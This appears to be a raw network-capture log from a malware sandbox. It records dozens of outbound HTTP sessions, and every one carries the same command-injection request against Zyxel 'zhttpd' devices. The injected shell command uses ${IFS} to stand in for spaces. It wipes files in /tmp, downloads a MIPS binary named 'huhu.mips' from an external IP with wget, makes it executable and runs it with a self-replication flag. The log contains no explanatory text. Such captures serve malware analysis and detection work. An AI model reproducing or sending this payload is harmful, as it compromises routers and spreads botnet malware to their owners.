                                                Jan 29, 2024 07:07:37.084445953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1692192.168.2.235624074.73.106.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084492922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1693192.168.2.235489439.113.142.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084531069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1694192.168.2.2359744223.6.9.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084570885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1695192.168.2.2346422157.50.168.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084602118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1696192.168.2.235105838.112.125.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084671974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1697192.168.2.2343760103.115.147.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084702015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1698192.168.2.2349874141.34.59.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.084739923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1699192.168.2.234435650.44.121.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104223967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1700192.168.2.23367661.168.89.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104336023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1701192.168.2.2352866100.225.87.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104404926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1702192.168.2.2353182116.237.215.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104481936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1703192.168.2.2333724180.242.177.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104520082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1704192.168.2.234973288.87.246.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104556084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1705192.168.2.234437489.61.51.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104609013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1706192.168.2.233812423.36.81.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104675055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1707192.168.2.235237261.53.9.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104753017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1708192.168.2.2360428124.236.186.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104799986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1709192.168.2.2342684121.21.113.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104887009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1710192.168.2.2348972136.34.166.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.104963064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1711192.168.2.2343050154.51.185.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105015039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1712192.168.2.235734095.112.189.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105073929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1713192.168.2.234895619.73.127.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105129957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1714192.168.2.2346620204.116.136.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105181932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1715192.168.2.2344174173.25.141.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105237007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1716192.168.2.235611479.171.245.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105288029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1717192.168.2.2360462111.147.138.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105365038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1718192.168.2.23363662.78.208.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105422974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1719192.168.2.235257449.44.141.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105478048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1720192.168.2.234631686.76.254.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105525017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1721192.168.2.2358232129.217.215.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105576992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1722192.168.2.2344726166.122.202.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105643034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1723192.168.2.2337714167.164.133.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105726004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1724192.168.2.233962694.128.37.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105783939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1725192.168.2.2340644221.156.107.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105855942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1726192.168.2.233499441.17.20.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105911016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1727192.168.2.235847494.40.38.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.105979919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1728192.168.2.236074690.143.48.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106049061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1729192.168.2.2357496145.219.81.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106090069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1730192.168.2.23455922.213.72.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106152058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1731192.168.2.2347452205.238.87.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106221914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1732192.168.2.2353918167.149.227.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106283903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1733192.168.2.234553692.203.31.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106331110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1734192.168.2.233315284.33.218.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106396914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1735192.168.2.234478835.151.0.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106472015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1736192.168.2.2356816128.16.199.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106518030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1737192.168.2.2357612137.36.59.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106566906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1738192.168.2.2352554123.229.179.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106625080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1739192.168.2.2340808158.66.137.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106684923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1740192.168.2.2356582111.26.151.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106750011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1741192.168.2.2352698204.58.147.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106796026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1742192.168.2.233819299.65.132.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106849909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1743192.168.2.2349224205.78.248.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106914043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1744192.168.2.2333756185.56.105.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.106971025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1745192.168.2.233346657.192.19.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107029915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1746192.168.2.233749231.141.200.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107109070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1747192.168.2.235621450.220.233.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107139111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1748192.168.2.2359072107.194.164.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107289076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1749192.168.2.235189054.61.43.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107330084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1750192.168.2.2353814186.85.198.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107408047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1751192.168.2.2347640206.176.204.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107474089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1752192.168.2.2341552197.119.42.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107547045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1753192.168.2.2353074168.146.56.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107589006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1754192.168.2.2336410183.139.201.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:38.107657909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1755192.168.2.2355348129.28.139.241443
                                                TimestampBytes transferredDirectionData
